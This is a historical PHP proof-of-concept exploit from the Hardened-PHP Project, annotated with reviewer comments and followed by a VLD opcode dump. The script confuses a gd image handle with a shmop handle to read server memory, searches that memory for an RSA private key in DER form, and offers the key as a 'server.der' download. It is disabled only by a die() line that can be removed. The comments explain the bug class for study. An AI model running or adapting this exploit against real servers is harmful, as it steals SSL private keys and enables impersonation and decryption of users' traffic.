<?php
////////////////////////////////////////////////////////////////////////
// [ASCII-art "Hardened-PHP" banner; its column layout was lost when the
//  page was extracted, so it is not reproduced here]
//
// Proof of concept code from the Hardened-PHP Project
// (C) Copyright 2007 Stefan Esser
////////////////////////////////////////////////////////////////////////
// PHP ext/shmop SSL RSA Private-Key Disclosure Exploit
////////////////////////////////////////////////////////////////////////
//
// Reviewer notes (historical PoC, kept for study of the bug class):
// - The script is deliberately disabled: the die() below runs before
//   anything else, and the accompanying VLD dump marks every later
//   opcode as unreachable ('*').
// - The bug class is resource type confusion: a gd image handle is
//   handed to shmop_read(), which in the PHP 5-era shmop extension
//   appears to have accepted it as if it were a shared-memory segment
//   handle (the exact struct overlay is not shown here — confirm against
//   the ext/shmop source of that era).
// - On the PHP 8.0 used for this dump, imagecreate() returns a GdImage
//   object and shmop_read() requires a Shmop object, so the (int) cast
//   and call in peek() would be rejected at the parameter type check
//   rather than read process memory. Typed handle objects are the
//   mitigation for this class of confusion.

// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");

// Both extensions are required: gd supplies the handle being confused,
// shmop supplies the reader.
if (!extension_loaded("gd") || !extension_loaded("shmop")) {
    die("This demonstration exploit only works with ext/gd and ext/shmop loaded.");
}

// Create a 10x10 palette image in the global $rid and allocate palette
// entries 0 and 1 (both black); peek() later overwrites these two entries.
function init()
{
    global $rid;
    $rid = imagecreate(10,10);
    imagecolorallocate($rid, 0, 0, 0);
    imagecolorallocate($rid, 0, 0, 0);
}

// Read $size bytes starting at $addr by smuggling both values into the
// gd palette and then passing the gd handle (cast to int) to shmop_read().
// Entries 0 and 1 are freed and re-allocated with red = $addr and
// red = $size; presumably those two palette slots overlay the fields
// shmop_read() treats as segment base and length — TODO confirm against
// the PHP 5 ext/shmop struct layout. Returns whatever shmop_read()
// returns (false on failure).
function peek($addr, $size)
{
    global $rid;
    imagecolordeallocate($rid, 0);
    imagecolordeallocate($rid, 1);
    imagecolorallocate($rid, $addr, 0, 0);
    imagecolorallocate($rid, $size, 0, 0);
    return shmop_read((int)$rid, 0, $size);
}

init();

// Scan start: 0x08048000 is the classic i386 ELF load address; the
// 64 KiB offset presumably skips the first pages of the binary. The VLD
// dump shows the constant folded to 134578176 (0x08058000).
$offset = 0x08048000 + 1024 * 64;

// Walk memory in 1 KiB steps. Each read fetches 16 extra bytes so a
// candidate header straddling a step boundary is still seen; the
// "$position < 1024" check keeps the match inside the current step.
// There is no upper bound and no read-failure handling: the loop ends
// only when a candidate passes both checks below.
while (1) {
    $data = peek($offset, 1024 + 16);
    // 0x30 0x82: DER SEQUENCE tag with a two-byte length, which is how a
    // PKCS#1 RSAPrivateKey structure begins.
    $position = strpos($data, "\x30\x82");
    if ($position !== false && $position < 1024) {
        // Potential Key
        // After the 4-byte SEQUENCE header expect 02 01 00 02: INTEGER,
        // length 1, value 0 (the version field), then the next INTEGER tag.
        if (substr($data, $position+4, 4) == "\x02\x01\x00\x02") {
            // Total length = big-endian 16-bit body length + 4 header bytes.
            $length = ord($data[$position+2])*256+ord($data[$position+3])+4;
            $keydata = peek($offset + $position, $length);
            // Assume an exponent of 0x10001 to really find a RSA key and not a DSA one
            // Note: "> 0" rejects both a strpos() miss (false) and a match at
            // offset 0, so only an interior match accepts the candidate.
            if (strpos($keydata, "\x01\x00\x01") > 0) break;
        }
    }
    $offset += 1024;
}

// Deliver the recovered DER bytes as a file download.
header("Content-type: application/octet-stream");
header("Content-Disposition: attachment; filename=\"server.der\"");
echo $keydata;
?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 79) Position 1 = -2
filename:       /in/CJptn
function name:  (null)
number of ops:  77
compiled vars:  !0 = $offset, !1 = $data, !2 = $position, !3 = $length, !4 = $keydata
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   16     0  E > > EXIT                                                     'REMOVE+THIS+LINE'
   18     1*       INIT_FCALL                                               'extension_loaded'
          2*       SEND_VAL                                                 'gd'
          3*       DO_ICALL                                         $5      
          4*       BOOL_NOT                                         ~6      $5
          5*       JMPNZ_EX                                         ~6      ~6, ->11
          6*       INIT_FCALL                                               'extension_loaded'
          7*       SEND_VAL                                                 'shmop'
          8*       DO_ICALL                                         $7      
          9*       BOOL_NOT                                         ~8      $7
         10*       BOOL                                             ~6      ~8
         11*       JMPZ                                                     ~6, ->13
   19    12*       EXIT                                                     'This+demonstration+exploit+only+works+with+ext%2Fgd+and+ext%2Fshmop+loaded.'
   41    13*       INIT_FCALL                                               'init'
         14*       DO_FCALL                                      0          
   43    15*       ASSIGN                                                   !0, 134578176
   45    16*       JMP                                                      ->68
   47    17*       INIT_FCALL                                               'peek'
         18*       SEND_VAR                                                 !0
         19*       SEND_VAL                                                 1040
         20*       DO_FCALL                                      0  $11     
         21*       ASSIGN                                                   !1, $11
   49    22*       INIT_FCALL                                               'strpos'
         23*       SEND_VAR                                                 !1
         24*       SEND_VAL                                                 '0%82'
         25*       DO_ICALL                                         $13     
         26*       ASSIGN                                                   !2, $13
   50    27*       TYPE_CHECK                                  1018  ~15     !2
         28*       JMPZ_EX                                          ~15     ~15, ->31
         29*       IS_SMALLER                                       ~16     !2, 1024
         30*       BOOL                                             ~15     ~16
         31*       JMPZ                                                     ~15, ->67
   52    32*       INIT_FCALL                                               'substr'
         33*       SEND_VAR                                                 !1
         34*       ADD                                              ~17     !2, 4
         35*       SEND_VAL                                                 ~17
         36*       SEND_VAL                                                 4
         37*       DO_ICALL                                         $18     
         38*       IS_EQUAL                                                 $18, '%02%01%00%02'
         39*       JMPZ                                                     ~19, ->67
   53    40*       INIT_FCALL                                               'ord'
         41*       ADD                                              ~20     !2, 2
         42*       FETCH_DIM_R                                      ~21     !1, ~20
         43*       SEND_VAL                                                 ~21
         44*       DO_ICALL                                         $22     
         45*       MUL                                              ~23     $22, 256
         46*       INIT_FCALL                                               'ord'
         47*       ADD                                              ~24     !2, 3
         48*       FETCH_DIM_R                                      ~25     !1, ~24
         49*       SEND_VAL                                                 ~25
         50*       DO_ICALL                                         $26     
         51*       ADD                                              ~27     ~23, $26
         52*       ADD                                              ~28     ~27, 4
         53*       ASSIGN                                                   !3, ~28
   54    54*       INIT_FCALL                                               'peek'
         55*       ADD                                              ~30     !0, !2
         56*       SEND_VAL                                                 ~30
         57*       SEND_VAR                                                 !3
         58*       DO_FCALL                                      0  $31     
         59*       ASSIGN                                                   !4, $31
   56    60*       INIT_FCALL                                               'strpos'
         61*       SEND_VAR                                                 !4
         62*       SEND_VAL                                                 '%01%00%01'
         63*       DO_ICALL                                         $33     
         64*       IS_SMALLER                                               0, $33
         65*       JMPZ                                                     ~34, ->67
   57    66*       JMP                                                      ->69
   60    67*       ASSIGN_OP                                     1          !0, 1024
   45    68*       JMPNZ                                                    1, ->17
   63    69*       INIT_FCALL                                               'header'
         70*       SEND_VAL                                                 'Content-type%3A+application%2Foctet-stream'
         71*       DO_ICALL                                                 
   64    72*       INIT_FCALL                                               'header'
         73*       SEND_VAL                                                 'Content-Disposition%3A+attachment%3B+filename%3D%22server.der%22'
         74*       DO_ICALL                                                 
   65    75*       ECHO                                                     !4
   66    76*     > RETURN                                                   1

Function init:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/CJptn
function name:  init
number of ops:  19
compiled vars:  !0 = $rid
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   24     0  E >   BIND_GLOBAL                                              !0, 'rid'
   26     1        INIT_FCALL_BY_NAME                                       'imagecreate'
          2        SEND_VAL_EX                                              10
          3        SEND_VAL_EX                                              10
          4        DO_FCALL                                      0  $1      
          5        ASSIGN                                                   !0, $1
   27     6        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
          7        SEND_VAR_EX                                              !0
          8        SEND_VAL_EX                                              0
          9        SEND_VAL_EX                                              0
         10        SEND_VAL_EX                                              0
         11        DO_FCALL                                      0          
   28    12        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
         13        SEND_VAR_EX                                              !0
         14        SEND_VAL_EX                                              0
         15        SEND_VAL_EX                                              0
         16        SEND_VAL_EX                                              0
         17        DO_FCALL                                      0          
   29    18      > RETURN                                                   null

End of function init

Function peek:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/CJptn
function name:  peek
number of ops:  31
compiled vars:  !0 = $addr, !1 = $size, !2 = $rid
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   31     0  E >   RECV                                             !0      
          1        RECV                                             !1      
   33     2        BIND_GLOBAL                                              !2, 'rid'
   34     3        INIT_FCALL_BY_NAME                                       'imagecolordeallocate'
          4        SEND_VAR_EX                                              !2
          5        SEND_VAL_EX                                              0
          6        DO_FCALL                                      0          
   35     7        INIT_FCALL_BY_NAME                                       'imagecolordeallocate'
          8        SEND_VAR_EX                                              !2
          9        SEND_VAL_EX                                              1
         10        DO_FCALL                                      0          
   36    11        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
         12        SEND_VAR_EX                                              !2
         13        SEND_VAR_EX                                              !0
         14        SEND_VAL_EX                                              0
         15        SEND_VAL_EX                                              0
         16        DO_FCALL                                      0          
   37    17        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
         18        SEND_VAR_EX                                              !2
         19        SEND_VAR_EX                                              !1
         20        SEND_VAL_EX                                              0
         21        SEND_VAL_EX                                              0
         22        DO_FCALL                                      0          
   38    23        INIT_FCALL_BY_NAME                                       'shmop_read'
         24        CAST                                          4  ~7      !2
         25        SEND_VAL_EX                                              ~7
         26        SEND_VAL_EX                                              0
         27        SEND_VAR_EX                                              !1
         28        DO_FCALL                                      0  $8      
         29      > RETURN                                                   $8
   39    30*     > RETURN                                                   null

End of function peek

Generated using Vulcan Logic Dumper, using php 8.0.0

